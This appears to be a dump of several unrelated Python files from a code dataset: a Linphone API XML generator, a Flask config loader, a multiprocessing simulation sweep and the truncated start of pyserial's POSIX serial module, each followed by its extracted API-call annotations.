__canBeWrapped(self, node): return node.find('./detaileddescription//donotwrap') is None def __discoverClasses(self): for td in self.__typedefs: if td.definition.startswith('enum '): for e in self.enums: if (e.associatedTypedef is None) and td.definition[5:] == e.name: e.associatedTypedef = td break elif td.definition.startswith('struct '): structFound = False for st in self.__structs: if (st.associatedTypedef is None) and td.definition[7:] == st.name: st.associatedTypedef = td structFound = True break if not structFound: name = td.definition[7:] print("Structure with no associated typedef: " + name) st = CStruct(name) st.associatedTypedef = td self.add(st) for td in self.__typedefs: if td.definition.startswith('struct '): for st in self.__structs: if st.associatedTypedef == td: cclass = CClass(st) cclass.briefDoc = td.briefDoc self.add(cclass) break elif ('Linphone' + td.definition) == td.name: st = CStruct(td.name) st.associatedTypedef = td cclass = CClass(st) cclass.briefDoc = td.briefDoc self.add(st) self.add(cclass) # Sort classes by length of name (longest first), so that methods are put in the right class self.classes.sort(key = lambda c: len(c.name), reverse = True) for e in self.__events: eventAdded = False for c in self.classes: if c.name.endswith('Cbs') and e.name.startswith(c.name): c.addEvent(e) eventAdded = True break if not eventAdded: for c in self.classes: if e.name.startswith(c.name): c.addEvent(e) eventAdded = True 
break for f in self.__functions: for c in self.classes: if c.cFunctionPrefix == f.name[0 : len(c.cFunctionPrefix)]: c.addMethod(f) break def __parseCEnumValueInitializer(self, initializer): initializer = initializer.strip() if not initializer.startswith('='): return None initializer = initializer[1:] initializer.strip() return initializer def __parseCEnumValue(self, node): ev = CEnumValue(node.find('./name').text) initializerNode = node.find('./initializer') if initializerNode is not None: ev.value = self.__parseCEnumValueInitializer(initializerNode.text) deprecatedNode = node.find(".//xrefsect[xreftitle='Deprecated']") if deprecatedNode is not None: ev.deprecated = True ev.briefDescription = ''.join(node.find('./briefdescription').itertext()).strip() ev.briefDoc = self.docparser.parse_description(node.find('./briefdescription')) ev.detailedDescription = self.__cleanDescription(node.find('./detaileddescription')) return ev def __parseCEnumMemberdef(self, node): if not Project.__canBeWrapped(self, node): return None e = CEnum(node.find('./name').text) deprecatedNode = node.find(".//xrefsect[xreftitle='Deprecated']") if deprecatedNode is not None: e.deprecated = True e.briefDescription = ''.join(node.find('./briefdescription').itertext()).strip() e.briefDoc = self.docparser.parse_description(node.find('./briefdescription')) e.detailedDescription = self.__cleanDescription(node.find('./detaileddescription')) enumvalues = node.findall("enumvalue[@prot='public']") for enumvalue in enumvalues: ev = self.__parseCEnumValue(enumvalue) e.addValue(ev) return e def __findCEnum(self, tree): memberdefs = tree.findall("./compounddef[@kind='group']/sectiondef[@kind='enum']/memberdef[@kind='enum'][@prot='public']") for m in memberdefs: e = self.__parseCEnumMemberdef(m) self.add(e) def __parseCStructMember(self, node, structname): name = node.find('./name').text definition = node.find('./definition').text t = definition[0:definition.find(structname + "::" + name)] sm = CStructMember(name, t) deprecatedNode = node.find(".//xrefsect[xreftitle='Deprecated']") if deprecatedNode is not None: sm.deprecated = True sm.briefDescription = ''.join(node.find('./briefdescription').itertext()).strip() sm.briefDoc = self.docparser.parse_description(node.find('./briefdescription')) sm.detailedDescription = self.__cleanDescription(node.find('./detaileddescription')) return sm def __parseCStructCompounddef(self, node): s = CStruct(node.find('./compoundname').text) deprecatedNode = node.find(".//xrefsect[xreftitle='Deprecated']") if deprecatedNode is not None: s.deprecated = True s.briefDescription = ''.join(node.find('./briefdescription').itertext()).strip() s.briefDoc = self.docparser.parse_description(node.find('./briefdescription')) s.detailedDescription = self.__cleanDescription(node.find('./detaileddescription')) structmembers = node.findall("sectiondef/memberdef[@kind='variable'][@prot='public']") for structmember in structmembers: sm = self.__parseCStructMember(structmember, s.name) s.addMember(sm) return s def __findCStruct(self, tree): compounddefs = tree.findall("./compounddef[@kind='struct'][@prot='public']") for c in compounddefs: s = self.__parseCStructCompounddef(c) self.add(s) def __parseCTypedefMemberdef(self, node): if not Project.__canBeWrapped(self, node): return None name = node.find('./name').text definition = node.find('./definition').text if definition.startswith('typedef '): definition = definition[8 :] if name.endswith('Cb'): pos = definition.find("(*") if pos == -1: return None returntype = 
definition[0:pos].strip() returnarg = CArgument(returntype, enums = self.enums, structs = self.__structs) returndesc = node.find("./detaileddescription/para/simplesect[@kind='return']") if returndesc is not None: if returnarg.ctype == 'MSList' or returnarg.ctype == 'bctbx_list_t': n = returndesc.find('.//bctbxlist') if n is not None: returnarg.containedType = n.text returnarg.description = self.__cleanDescription(returndesc) elif returnarg.completeType != 'void': missingDocWarning += "\tReturn value is not documented\n" definition = definition[pos + 2 :] pos = definition.find("(") definition = definition[pos + 1 : -1] argslist = CArgumentsList() for argdef in definition.split(', '): argType = '' starPos = argdef.rfind('*') spacePos = argdef.rfind(' ') if starPos != -1: argType = argdef[0 : starPos + 1] argName = argdef[starPos + 1 :] elif spacePos != -1: argType = argdef[0 : spacePos] argName = argdef[spacePos + 1 :] argslist.addArgument(CArgument(argType, argName, self.enums, self.__structs)) if len(argslist) > 0: paramdescs = node.findall("detaileddescription/para/parameterlist[@kind='param']/parameteritem") if paramdescs: for arg in argslist.arguments: for paramdesc in paramdescs: if arg.name == paramdesc.find('./parameternamelist').find('./parametername').text: arg.description = self.__cleanDescription(paramdesc.find('./parameterdescription')) missingDocWarning = '' for arg in argslist.arguments: if arg.description == None: missingDocWarning += "\t'" + arg.name + "' parameter not documented\n"; if missingDocWarning != '': print(name + ":\n" + missingDocWarning) f = CEvent(name, returnarg, argslist) deprecatedNode = node.find(".//xrefsect[xreftitle='Deprecated']") if deprecatedNode is not None: f.deprecated = True f.briefDescription = ''.join(node.find('./briefdescription').itertext()).strip() f.briefDoc = self.docparser.parse_description(node.find('./briefdescription')) f.detailedDescription = self.__cleanDescription(node.find('./detaileddescription')) return f else: pos = definition.rfind(" " + name) if pos != -1: definition = definition[0 : pos] td = CTypedef(name, definition) deprecatedNode = node.find(".//xrefsect[xreftitle='Deprecated']") if deprecatedNode is not None: td.deprecated = True td.briefDescription = ''.join(node.find('./briefdescription').itertext()).strip() td.briefDoc = self.docparser.parse_description(node.find('./briefdescription')) td.detailedDescription = self.__cleanDescription(node.find('./detaileddescription')) return td return None def __findCTypedef(self, tree): memberdefs = tree.findall("./compounddef[@kind='group']/sectiondef[@kind='typedef']/memberdef[@kind='typedef'][@prot='public']") for m in memberdefs: td = self.__parseCTypedefMemberdef(m) self.add(td) def __parseCFunctionMemberdef(self, node): if not Project.__canBeWrapped(self, node): return None internal = node.find("./detaileddescription/internal") if internal is not None: return None missingDocWarning = '' name = node.find('./name').text t = ''.join(node.find('./type').itertext()) returnarg = CArgument(t, enums = self.enums, structs = self.__structs) returndesc = node.find("./detaileddescription/para/simplesect[@kind='return']") if returndesc is not None: if returnarg.ctype == 'MSList' or returnarg.ctype == 'bctbx_list_t': n = returndesc.find('.//bctbxlist') if n is not None: returnarg.containedType = n.text returnarg.description = self.__cleanDescription(returndesc) elif returnarg.completeType != 'void': missingDocWarning += "\tReturn value is not documented\n" argslist = CArgumentsList() 
argslistNode = node.findall('./param') for argNode in argslistNode: argType = ''.join(argNode.find('./type').itertext()) argName = '' argNameNode = argNode.find('./declname') if argNameNode is not None: argName = ''.join(argNameNode.itertext()) if argType != 'void': argslist.addArgument(CArgument(argType, argName, self.enums, self.__structs)) if len(argslist) > 0: paramdescs = node.findall("./detaileddescription/para/parameterlist[@kind='param']/parameteritem") if paramdescs: for arg in argslist.arguments: for paramdesc in paramdescs: if arg.name == paramdesc.find('./parameternamelist').find('./parametername').text: if arg.ctype == 'MSList' or arg.ctype == 'bctbx_list_t': n = paramdesc.find('.//bctbxlist') if n is not None: arg.containedType = n.text arg.description = self.__cleanDescription(paramdesc.find('./parameterdescription')) missingDocWarning = '' for arg in argslist.arguments: if arg.description == None: missingDocWarning += "\t'" + arg.name + "' parameter not documented\n"; f = CFunction(name, returnarg, argslist) deprecatedNode = node.find(".//xrefsect[xreftitle='Deprecated']") if deprecatedNode is not None: f.deprecated = True f.briefDescription = ''.join(node.find('./briefdescription').itertext()).strip() f.briefDoc = self.docparser.parse_description(node.find('./briefdescription')) f.detailedDescription = self.__cleanDescription(node.find('./detaileddescription')) if f.briefDescription == '' and ''.join(f.detailedDescription.itertext()).strip() == '': return None locationNode = node.find('./location') if locationNode is not None: f.location = locationNode.get('file') if not f.location.endswith('.h'): missingDocWarning += "\tNot documented in a header file ('" + f.location + "')\n"; if missingDocWarning != '': print(name + ":\n" + missingDocWarning) return f def __findCFunction(self, tree): memberdefs = tree.findall("./compounddef[@kind='group']/sectiondef[@kind='func']/memberdef[@kind='function'][@prot='public'][@static='no']") for m in memberdefs: f = self.__parseCFunctionMemberdef(m) if f is not None: self.add(f) def initFromFiles(self, xmlfiles): trees = [] for f in xmlfiles: tree = None try: if self.verbose: print("Parsing XML file: " + f.name) tree = ET.parse(f) except ET.ParseError as e: print(e) if tree is not None: trees.append(tree) for tree in trees: self.__findCEnum(tree) for tree in trees: self.__findCStruct(tree) for tree in trees: self.__findCTypedef(tree) for tree in trees: self.__findCFunction(tree) self.__discoverClasses() def initFromDir(self, xmldir): files = [ os.path.join(xmldir, f) for f in os.listdir(xmldir) if (os.path.isfile(os.path.join(xmldir, f)) and f.endswith('.xml')) ] self.initFromFiles(files) def check(self): for c in self.classes: for name, p in six.iteritems(c.properties): if p.getter is None and p.setter is not None: print("Property '" + name + "' of class '" + c.name + "' has a setter but no getter") class Generator: def __init__(self, outputfile): self.__outputfile = outputfile def __generateEnum(self, cenum, enumsNode): enumNodeAttributes = { 'name' : cenum.name, 'deprecated' : str(cenum.deprecated).lower() } if cenum.associatedTypedef is not None: enumNodeAttributes['name'] = cenum.associatedTypedef.name enumNode = ET.SubElement(enumsNode, 'enum', enumNodeAttributes) if cenum.briefDescription != '': enumBriefDescriptionNode = ET.SubElement(enumNode, 'briefdescription') enumBriefDescriptionNode.text = cenum.briefDescription enumNode.append(cenum.detailedDescription) if len(cenum.values) > 0: enumValuesNode = ET.SubElement(enumNode, 
'values') for value in cenum.values: enumValuesNodeAttributes = { 'name' : value.name, 'deprecated' : str(value.deprecated).lower() } valueNode = ET.SubElement(enumValuesNode, 'value', enumValuesNodeAttributes) if value.briefDescription != '': valueBriefDescriptionNode = ET.SubElement(valueNode, 'briefdescription') valueBriefDescriptionNode.text = value.briefDescription valueNode.append(value.detailedDescription) def __generateFunction(self, parentNode, nodeName, f): functionAttributes = { 'name' : f.name, 'deprecated' : str(f.deprecated).lower() } if f.location is not None: functionAttributes['location'] = f.location functionNode = ET.SubElement(parentNode, nodeName, functionAttributes) returnValueAttributes = { 'type' : f.returnArgument.ctype, 'completetype' : f.returnArgument.completeType } if f.returnArgument.containedType is not None: returnValueAttributes['containedtype'] = f.returnArgument.containedType returnValueNode = ET.SubElement(functionNode, 'return', returnValueAttributes) if f.returnArgument.description is not None: returnValueNode.append(f.returnArgument.description) argumentsNode = ET.SubElement(functionNode, 'arguments') for arg in f.arguments: argumentNodeAttributes = { 'name' : arg.name, 'type' : arg.ctype, 'completetype' : arg.completeType } if arg.containedType is not None: argumentNodeAttributes['containedtype'] = arg.containedType argumentNode = ET.SubElement(argumentsNode, 'argument', argumentNodeAttributes) if arg.description is not None: argumentNode.append(arg.description) if f.briefDescription != '': functionBriefDescriptionNode = ET.SubElement(functionNode, 'briefdescription') functionBriefDescriptionNode.text = f.briefDescription functionNode.append(f.detailedDescription) def __generateClass(self, cclass, classesNode): # Do not include classes that contain nothing if len(cclass.events) == 0 and len(cclass.classMethods) == 0 and \ len(cclass.instanceMethods) == 0 and len(cclass.properties) == 0: return # Check the capabilities of the class has_ref_method = False has_unref_method = False has_destroy_method = False for methodname in cclass.instanceMethods: methodname_without_prefix = methodname.replace(cclass.cFunctionPrefix, '') if methodname_without_prefix == 'ref': has_ref_method = True elif methodname_without_prefix == 'unref': has_unref_method = True elif methodname_without_prefix == 'destroy': has_destroy_method = True refcountable = False destroyable = False if has_ref_method and has_unref_method: refcountable = True if has_destroy_method: destroyable = True classNodeAttributes = { 'name' : cclass.name, 'cfunctionprefix' : cclass.cFunctionPrefix, 'deprecated' : str(cclass.deprecated).lower(), 'refcountable' : str(refcountable).lower(), 'destroyable' : str(destroyable).lower() } # Generate the XML node for the class classNode = ET.SubElement(classesNode, 'class', classNodeAttributes) if len(cclass.events) > 0: eventsNode = ET.SubElement(classNode, 'events') eventnames = [] for eventname in cclass.events: eventnames.append(eventname) eventnames.sort() for eventname in eventnames: self.__generateFunction(eventsNode, 'event', cclass.events[eventname]) if len(cclass.classMethods) > 0: classMethodsNode = ET.SubElement(classNode, 'classmethods') methodnames = [] for methodname in cclass.classMethods: methodnames.append(methodname) methodnames.sort() for methodname in methodnames: self.__generateFunction(classMethodsNode, 'classmethod', cclass.classMethods[methodname]) if len(cclass.instanceMethods) > 0: instanceMethodsNode = ET.SubElement(classNode, 
'instancemethods') methodnames = [] for methodname in cclass.instanceMethods: methodnames.append(methodname) methodnames.sort() for methodname in methodnames: self.__generateFunction(instanceMethodsNode, 'instancemethod', cclass.instanceMethods[methodname]) if len(cclass.properties) > 0: propertiesNode = ET.SubElement(classNode, 'properties') propnames = [] for propname in cclass.properties: propnames.append(propname) propnames.sort() for propname in propnames: propertyNodeAttributes = { 'name' : propname } propertyNode = ET.SubElement(propertiesNode, 'property', propertyNodeAttributes) if cclass.properties[propname].getter is not None: self.__generateFunction(propertyNode, 'getter', cclass.properties[propname].getter) if cclass.properties[propname].setter is not None: self.__generateFunction(propertyNode, 'setter', cclass.properties[propname].setter) if cclass.briefDescription != '': classBriefDescriptionNode = ET.SubElement(classNode, 'briefdescription') classBriefDescriptionNode.text = cclass.briefDescription classNode.append(cclass.detailedDescription) def generate(self, project): print("Generating XML document of Linphone API to '" + self.__outputfile.name + "'") apiNode = ET.Element('api') project.enums.sort(key = lambda e: e.name) if len(project.enums) > 0: enumsNode = ET.SubElement(apiNode, 'enums') for cenum in project.enums: self.__generateEnum(cenum, enumsNode) if len(project.classes) > 0: classesNode = ET.SubElement(apiNode, 'classes') project.classes.sort(key = lambda c: c.name) for cclass in project.classes: self.__generateClass(cclass, classesNode) s = '<?xml version="1.0" encoding="UTF-8" ?>\n'.encode('utf-8') s += ET.tostring(apiNode, 'utf-8') if project.prettyPrint: s = minidom.parseString(s).toprettyxml(indent='\t') self.__outputfile.write(s) def main(argv = None): if argv is None: argv = sys.argv argparser = argparse.ArgumentParser(description="Generate XML version of the Linphone API.") argparser.add_argument('-o', '--outputfile', metavar='outputfile', type=argparse.FileType('w'), help="Output XML file describing the Linphone API.") argparser.add_argument('--verbose', help="Increase output verbosity", action='store_true') argparser.add_argument('--pretty', help="XML pretty print", action='store_true') argparser.add_argument('xmldir', help="XML directory generated by doxygen.") args = argparser.parse_args() if args.outputfile == None: args.outputfile = open('api.xml', 'w') project = Project() if args.verbose: project.verbose = True if args.pretty: project.prettyPrint = True project.initFromDir(args.xmldir) project.check() gen = Generator(args.outputfile) gen.generate(project) if __name__ == "__main__": sys.exit(main())
[ "argparse.FileType", "os.listdir", "xml.etree.ElementTree.parse", "argparse.ArgumentParser", "metadoc.Parser", "xml.etree.ElementTree.tostring", "os.path.join", "xml.etree.ElementTree.Element", "xml.dom.minidom.parseString", "xml.etree.ElementTree.SubElement", "six.iteritems" ]
[((27754, 27839), 'argparse.ArgumentParser', 'argparse.ArgumentParser', ([], {'description': '"""Generate XML version of the Linphone API."""'}), "(description='Generate XML version of the Linphone API.'\n )\n", (27777, 27839), False, 'import argparse\n'), ((6873, 6889), 'metadoc.Parser', 'metadoc.Parser', ([], {}), '()\n', (6887, 6889), False, 'import metadoc\n'), ((21658, 21710), 'xml.etree.ElementTree.SubElement', 'ET.SubElement', (['enumsNode', '"""enum"""', 'enumNodeAttributes'], {}), "(enumsNode, 'enum', enumNodeAttributes)\n", (21671, 21710), True, 'import xml.etree.ElementTree as ET\n'), ((22676, 22731), 'xml.etree.ElementTree.SubElement', 'ET.SubElement', (['parentNode', 'nodeName', 'functionAttributes'], {}), '(parentNode, nodeName, functionAttributes)\n', (22689, 22731), True, 'import xml.etree.ElementTree as ET\n'), ((22986, 23046), 'xml.etree.ElementTree.SubElement', 'ET.SubElement', (['functionNode', '"""return"""', 'returnValueAttributes'], {}), "(functionNode, 'return', returnValueAttributes)\n", (22999, 23046), True, 'import xml.etree.ElementTree as ET\n'), ((23168, 23208), 'xml.etree.ElementTree.SubElement', 'ET.SubElement', (['functionNode', '"""arguments"""'], {}), "(functionNode, 'arguments')\n", (23181, 23208), True, 'import xml.etree.ElementTree as ET\n'), ((24979, 25035), 'xml.etree.ElementTree.SubElement', 'ET.SubElement', (['classesNode', '"""class"""', 'classNodeAttributes'], {}), "(classesNode, 'class', classNodeAttributes)\n", (24992, 25035), True, 'import xml.etree.ElementTree as ET\n'), ((27044, 27061), 'xml.etree.ElementTree.Element', 'ET.Element', (['"""api"""'], {}), "('api')\n", (27054, 27061), True, 'import xml.etree.ElementTree as ET\n'), ((27539, 27568), 'xml.etree.ElementTree.tostring', 'ET.tostring', (['apiNode', '"""utf-8"""'], {}), "(apiNode, 'utf-8')\n", (27550, 27568), True, 'import xml.etree.ElementTree as ET\n'), ((20936, 20959), 'os.path.join', 'os.path.join', (['xmldir', 'f'], {}), '(xmldir, f)\n', (20948, 20959), False, 'import os\n'), ((21148, 21175), 'six.iteritems', 'six.iteritems', (['c.properties'], {}), '(c.properties)\n', (21161, 21175), False, 'import six\n'), ((21776, 21819), 'xml.etree.ElementTree.SubElement', 'ET.SubElement', (['enumNode', '"""briefdescription"""'], {}), "(enumNode, 'briefdescription')\n", (21789, 21819), True, 'import xml.etree.ElementTree as ET\n'), ((21971, 22004), 'xml.etree.ElementTree.SubElement', 'ET.SubElement', (['enumNode', '"""values"""'], {}), "(enumNode, 'values')\n", (21984, 22004), True, 'import xml.etree.ElementTree as ET\n'), ((23459, 23523), 'xml.etree.ElementTree.SubElement', 'ET.SubElement', (['argumentsNode', '"""argument"""', 'argumentNodeAttributes'], {}), "(argumentsNode, 'argument', argumentNodeAttributes)\n", (23472, 23523), True, 'import xml.etree.ElementTree as ET\n'), ((23665, 23712), 'xml.etree.ElementTree.SubElement', 'ET.SubElement', (['functionNode', '"""briefdescription"""'], {}), "(functionNode, 'briefdescription')\n", (23678, 23712), True, 'import xml.etree.ElementTree as ET\n'), ((25081, 25115), 'xml.etree.ElementTree.SubElement', 'ET.SubElement', (['classNode', '"""events"""'], {}), "(classNode, 'events')\n", (25094, 25115), True, 'import xml.etree.ElementTree as ET\n'), ((25388, 25428), 'xml.etree.ElementTree.SubElement', 'ET.SubElement', (['classNode', '"""classmethods"""'], {}), "(classNode, 'classmethods')\n", (25401, 25428), True, 'import xml.etree.ElementTree as ET\n'), ((25739, 25782), 'xml.etree.ElementTree.SubElement', 'ET.SubElement', (['classNode', 
'"""instancemethods"""'], {}), "(classNode, 'instancemethods')\n", (25752, 25782), True, 'import xml.etree.ElementTree as ET\n'), ((26095, 26133), 'xml.etree.ElementTree.SubElement', 'ET.SubElement', (['classNode', '"""properties"""'], {}), "(classNode, 'properties')\n", (26108, 26133), True, 'import xml.etree.ElementTree as ET\n'), ((26762, 26806), 'xml.etree.ElementTree.SubElement', 'ET.SubElement', (['classNode', '"""briefdescription"""'], {}), "(classNode, 'briefdescription')\n", (26775, 26806), True, 'import xml.etree.ElementTree as ET\n'), ((27151, 27182), 'xml.etree.ElementTree.SubElement', 'ET.SubElement', (['apiNode', '"""enums"""'], {}), "(apiNode, 'enums')\n", (27164, 27182), True, 'import xml.etree.ElementTree as ET\n'), ((27304, 27337), 'xml.etree.ElementTree.SubElement', 'ET.SubElement', (['apiNode', '"""classes"""'], {}), "(apiNode, 'classes')\n", (27317, 27337), True, 'import xml.etree.ElementTree as ET\n'), ((27908, 27930), 'argparse.FileType', 'argparse.FileType', (['"""w"""'], {}), "('w')\n", (27925, 27930), False, 'import argparse\n'), ((20565, 20576), 'xml.etree.ElementTree.parse', 'ET.parse', (['f'], {}), '(f)\n', (20573, 20576), True, 'import xml.etree.ElementTree as ET\n'), ((20969, 20987), 'os.listdir', 'os.listdir', (['xmldir'], {}), '(xmldir)\n', (20979, 20987), False, 'import os\n'), ((22152, 22216), 'xml.etree.ElementTree.SubElement', 'ET.SubElement', (['enumValuesNode', '"""value"""', 'enumValuesNodeAttributes'], {}), "(enumValuesNode, 'value', enumValuesNodeAttributes)\n", (22165, 22216), True, 'import xml.etree.ElementTree as ET\n'), ((26341, 26406), 'xml.etree.ElementTree.SubElement', 'ET.SubElement', (['propertiesNode', '"""property"""', 'propertyNodeAttributes'], {}), "(propertiesNode, 'property', propertyNodeAttributes)\n", (26354, 26406), True, 'import xml.etree.ElementTree as ET\n'), ((22287, 22331), 'xml.etree.ElementTree.SubElement', 'ET.SubElement', (['valueNode', '"""briefdescription"""'], {}), "(valueNode, 'briefdescription')\n", (22300, 22331), True, 'import xml.etree.ElementTree as ET\n'), ((27602, 27624), 'xml.dom.minidom.parseString', 'minidom.parseString', (['s'], {}), '(s)\n', (27621, 27624), True, 'import xml.dom.minidom as minidom\n'), ((21007, 21030), 'os.path.join', 'os.path.join', (['xmldir', 'f'], {}), '(xmldir, f)\n', (21019, 21030), False, 'import os\n')]
import configparser
import os

dir_path = os.path.dirname(os.path.realpath(__file__))
dir_path += '/cfg.ini'


class Configuration(object):
    def __init__(self, debug=False):
        section = "Flask-debug" if debug else "Flask"
        cfg = configparser.ConfigParser()
        cfg.read(dir_path if debug else "/var/www/html/flaskApp/cfg.ini")
        self.debug = cfg.getboolean(section, "DEBUG")
        self.csrf_enabled = cfg.getboolean(section, "CSRF_ENABLED")
        self.threads_per_page = cfg.getint(section, "THREADS_PER_PAGE")
        self.port = cfg.getint(section, "PORT")
        self.host = cfg.get(section, "HOST")
[ "os.path.realpath", "configparser.ConfigParser" ]
[((62, 88), 'os.path.realpath', 'os.path.realpath', (['__file__'], {}), '(__file__)\n', (78, 88), False, 'import os\n'), ((256, 283), 'configparser.ConfigParser', 'configparser.ConfigParser', ([], {}), '()\n', (281, 283), False, 'import configparser\n')]
from multiprocessing import Pool
import EnvEq as ee
import numpy as np
import itertools as it
import os

#parsing input into numpy arrays
from input import *

y0=np.array([y0_Tpos,y0_Tpro,y0_Tneg,y0_o2,y0_test])
p=np.array([p_o2,p_test])
mu=np.array([[mu_o2Tpos,mu_o2Tpro,mu_o2Tneg],[mu_testTpos,mu_testTpro,0]])
lam=np.array([lam_o2,lam_test])
t_D=np.array([t_DTpos,t_DTpro,t_DTneg])
r=np.array([r_Tpos,r_Tpro,r_Tneg])
delta=np.array([delta_Tpos,delta_Tpro,delta_Tneg])
rho=np.array([rho_Tpos,rho_Tpro,rho_Tneg])
lim=np.array([[[l_lim_o2Tpos,u_lim_o2Tpos],[l_lim_o2Tpro,u_lim_o2Tpro],[l_lim_o2Tneg,u_lim_o2Tneg]],[[l_lim_testTpos,u_lim_testTpos],[l_lim_testTpro,u_lim_testTpro],[0,0]]],dtype=np.float64)

#make directories for saving raw_outputs
try:
    os.makedirs("../../raw_output/EnvEq/"+f_name)
except:
    pass

#iterator over these
o2_lim_arr=np.empty([0,2])
for ulim_Tpro in np.arange(0.1,1,0.2):
    for ulim_Tneg in np.arange(0.1,1,0.2):
        o2_lim_arr=np.append(o2_lim_arr,[[ulim_Tpro,ulim_Tneg]],axis=0)

def solve_parm(u_lim_o2):  #calls the solve_eq function with all default inputs other than o2_lim
    f_name_i=f_name+"{:.1f}".format(u_lim_o2[0])+"-"+"{:.1f}".format(u_lim_o2[1])
    lim[0,1,1]=u_lim_o2[0]
    lim[0,2,1]=u_lim_o2[1]
    ee.solve_eq(t_max,dt,y0,p,mu,lam,r,K,delta,rho,lim,f_name_i)

if __name__ == '__main__':
    pool = Pool(4)
    pool.map(solve_parm,o2_lim_arr)  #iterate over the o2_lims
    pool.close()
    pool.join()
[ "EnvEq.solve_eq", "os.makedirs", "numpy.append", "numpy.array", "numpy.empty", "multiprocessing.Pool", "numpy.arange" ]
[((161, 214), 'numpy.array', 'np.array', (['[y0_Tpos, y0_Tpro, y0_Tneg, y0_o2, y0_test]'], {}), '([y0_Tpos, y0_Tpro, y0_Tneg, y0_o2, y0_test])\n', (169, 214), True, 'import numpy as np\n'), ((213, 237), 'numpy.array', 'np.array', (['[p_o2, p_test]'], {}), '([p_o2, p_test])\n', (221, 237), True, 'import numpy as np\n'), ((240, 316), 'numpy.array', 'np.array', (['[[mu_o2Tpos, mu_o2Tpro, mu_o2Tneg], [mu_testTpos, mu_testTpro, 0]]'], {}), '([[mu_o2Tpos, mu_o2Tpro, mu_o2Tneg], [mu_testTpos, mu_testTpro, 0]])\n', (248, 316), True, 'import numpy as np\n'), ((316, 344), 'numpy.array', 'np.array', (['[lam_o2, lam_test]'], {}), '([lam_o2, lam_test])\n', (324, 344), True, 'import numpy as np\n'), ((348, 385), 'numpy.array', 'np.array', (['[t_DTpos, t_DTpro, t_DTneg]'], {}), '([t_DTpos, t_DTpro, t_DTneg])\n', (356, 385), True, 'import numpy as np\n'), ((386, 420), 'numpy.array', 'np.array', (['[r_Tpos, r_Tpro, r_Tneg]'], {}), '([r_Tpos, r_Tpro, r_Tneg])\n', (394, 420), True, 'import numpy as np\n'), ((425, 471), 'numpy.array', 'np.array', (['[delta_Tpos, delta_Tpro, delta_Tneg]'], {}), '([delta_Tpos, delta_Tpro, delta_Tneg])\n', (433, 471), True, 'import numpy as np\n'), ((474, 514), 'numpy.array', 'np.array', (['[rho_Tpos, rho_Tpro, rho_Tneg]'], {}), '([rho_Tpos, rho_Tpro, rho_Tneg])\n', (482, 514), True, 'import numpy as np\n'), ((517, 725), 'numpy.array', 'np.array', (['[[[l_lim_o2Tpos, u_lim_o2Tpos], [l_lim_o2Tpro, u_lim_o2Tpro], [l_lim_o2Tneg,\n u_lim_o2Tneg]], [[l_lim_testTpos, u_lim_testTpos], [l_lim_testTpro,\n u_lim_testTpro], [0, 0]]]'], {'dtype': 'np.float64'}), '([[[l_lim_o2Tpos, u_lim_o2Tpos], [l_lim_o2Tpro, u_lim_o2Tpro], [\n l_lim_o2Tneg, u_lim_o2Tneg]], [[l_lim_testTpos, u_lim_testTpos], [\n l_lim_testTpro, u_lim_testTpro], [0, 0]]], dtype=np.float64)\n', (525, 725), True, 'import numpy as np\n'), ((852, 868), 'numpy.empty', 'np.empty', (['[0, 2]'], {}), '([0, 2])\n', (860, 868), True, 'import numpy as np\n'), ((885, 907), 'numpy.arange', 'np.arange', (['(0.1)', '(1)', '(0.2)'], {}), '(0.1, 1, 0.2)\n', (894, 907), True, 'import numpy as np\n'), ((755, 802), 'os.makedirs', 'os.makedirs', (["('../../raw_output/EnvEq/' + f_name)"], {}), "('../../raw_output/EnvEq/' + f_name)\n", (766, 802), False, 'import os\n'), ((928, 950), 'numpy.arange', 'np.arange', (['(0.1)', '(1)', '(0.2)'], {}), '(0.1, 1, 0.2)\n', (937, 950), True, 'import numpy as np\n'), ((1261, 1332), 'EnvEq.solve_eq', 'ee.solve_eq', (['t_max', 'dt', 'y0', 'p', 'mu', 'lam', 'r', 'K', 'delta', 'rho', 'lim', 'f_name_i'], {}), '(t_max, dt, y0, p, mu, lam, r, K, delta, rho, lim, f_name_i)\n', (1272, 1332), True, 'import EnvEq as ee\n'), ((1361, 1368), 'multiprocessing.Pool', 'Pool', (['(4)'], {}), '(4)\n', (1365, 1368), False, 'from multiprocessing import Pool\n'), ((969, 1024), 'numpy.append', 'np.append', (['o2_lim_arr', '[[ulim_Tpro, ulim_Tneg]]'], {'axis': '(0)'}), '(o2_lim_arr, [[ulim_Tpro, ulim_Tneg]], axis=0)\n', (978, 1024), True, 'import numpy as np\n')]
#!/usr/bin/env python # # Python Serial Port Extension for Win32, Linux, BSD, Jython # module for serial IO for POSIX compatible systems, like Linux # see __init__.py # # (C) 2001-2010 <NAME> <<EMAIL>> # this is distributed under a free software license, see license.txt # # parts based on code from <NAME> <<EMAIL>>: # ftp://ftp.visi.com/users/grante/python/PosixSerial.py # # references: http://www.easysw.com/~mike/serial/serial.html import sys, os, fcntl, termios, struct, select, errno, time from .serialutil import * # Do check the Python version as some constants have moved. if (sys.hexversion < 0x020100f0): import TERMIOS else: TERMIOS = termios if (sys.hexversion < 0x020200f0): import FCNTL else: FCNTL = fcntl # try to detect the OS so that a device can be selected... # this code block should supply a device() and set_special_baudrate() function # for the platform plat = sys.platform.lower() if plat[:5] == 'linux': # Linux (confirmed) def device(port): return '/dev/ttyS%d' % port ASYNC_SPD_MASK = 0x1030 ASYNC_SPD_CUST = 0x0030 def set_special_baudrate(port, baudrate): import array buf = array.array('i', [0] * 32) # get serial_struct FCNTL.ioctl(port.fd, TERMIOS.TIOCGSERIAL, buf) # set custom divisor buf[6] = buf[7] / baudrate # update flags buf[4] &= ~ASYNC_SPD_MASK buf[4] |= ASYNC_SPD_CUST # set serial_struct try: res = FCNTL.ioctl(port.fd, TERMIOS.TIOCSSERIAL, buf) except IOError: raise ValueError('Failed to set custom baud rate: %r' % baudrate) baudrate_constants = { 0: 0000000, # hang up 50: 0o000001, 75: 0o000002, 110: 0o000003, 134: 0o000004, 150: 0o000005, 200: 0o000006, 300: 0o000007, 600: 0o000010, 1200: 0o000011, 1800: 0o000012, 2400: 0o000013, 4800: 0o000014, 9600: 0o000015, 19200: 0o000016, 38400: 0o000017, 57600: 0o010001, 115200: 0o010002, 230400: 0o010003, 460800: 0o010004, 500000: 0o010005, 576000: 0o010006, 921600: 0o010007, 1000000: 0o010010, 1152000: 0o010011, 1500000: 0o010012, 2000000: 0o010013, 2500000: 0o010014, 3000000: 0o010015, 3500000: 0o010016, 4000000: 0o010017 } elif plat == 'cygwin': # cygwin/win32 (confirmed) def device(port): return '/dev/com%d' % (port + 1) def set_special_baudrate(port, baudrate): raise ValueError("sorry don't know how 